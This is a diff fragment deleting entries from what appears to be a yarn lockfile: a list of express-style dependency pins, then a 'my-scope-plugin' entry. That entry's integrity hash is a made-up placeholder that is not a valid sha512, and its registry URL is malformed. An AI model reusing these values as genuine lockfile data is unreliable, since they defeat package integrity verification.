-    cookie-signature "1.0.6"
-    debug "2.6.9"
-    depd "2.0.0"
-    encodeurl "~1.0.2"
-    escape-html "~1.0.3"
-    etag "~1.8.1"
-    finalhandler "1.2.0"
-    fresh "0.5.2"
-    http-errors "2.0.0"
-    merge-descriptors "1.0.1"
-    methods "~1.1.2"
-    on-finished "2.4.1"
-    parseurl "~1.3.3"
-    path-to-regexp "0.1.7"
-    proxy-addr "~2.0.7"
-    qs "6.11.0"
-    range-parser "~1.2.1"
-    safe-buffer "5.2.1"
-    send "0.18.0"
-    serve-static "1.15.0"
-    setprototypeof "1.2.0"
-    statuses "2.0.1"
-    type-is "~1.6.18"
-    utils-merge "1.0.1"
-    vary "~1.1.2"
-  dev false
-  optional false
-
-"my-scope-plugin@npm:my-scope-plugin@^1.0.0":
-  version "1.0.0"
-  resolved "https://registry.npmjs.org/my-scope-plugin-1.0.0.tgz"
-  integrity sha512-abcdefghijk123456789abcdef
-  dependencies:
-    lodash "^4.17.21"
-    axios "^1.6.0"
-  dev false
-  optional false